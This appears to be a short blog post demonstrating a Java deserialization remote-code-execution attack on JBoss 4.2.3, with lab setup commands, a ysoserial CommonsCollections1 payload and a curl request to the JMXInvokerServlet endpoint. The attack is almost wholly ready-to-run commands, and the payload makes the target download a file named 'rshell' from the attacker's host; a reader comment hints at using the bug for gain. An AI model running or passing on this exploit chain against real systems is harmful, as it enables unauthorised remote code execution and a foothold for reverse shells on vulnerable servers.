# Unserialize rce vulnerability in Java


Server - 192.168.1.1
# wget -O jboss-4.2.3.zip http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA-jdk6.zip/download
# unzip jboss-4.2.3.zip
# mv jboss-4.2.3.GA /usr/local/share/jboss
# adduser appserver
# chown -R appserver /usr/local/share/jboss
# su -l appserver
$ cd /usr/local/share/jboss/bin
$ ./run.sh -b 0.0.0.0

Client - 192.168.1.2
# wget https://github.com/frohoff/ysoserial/releases/download/v0.0.2/ysoserial-0.0.2-all.jar
# java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'wget -O /tmp/rshell http://192.168.1.2/rshell' > /tmp/payload
# curl --header 'Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue' --data-binary '@/tmp/payload' http://192.168.1.1:8080/invoker/JMXInvokerServlet

References

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

1 comment:

Anonymous said...

Voy a ver si consigo algo...
Pero todo apunta a que gracias a este "bug" voy a triunfar! XD

K.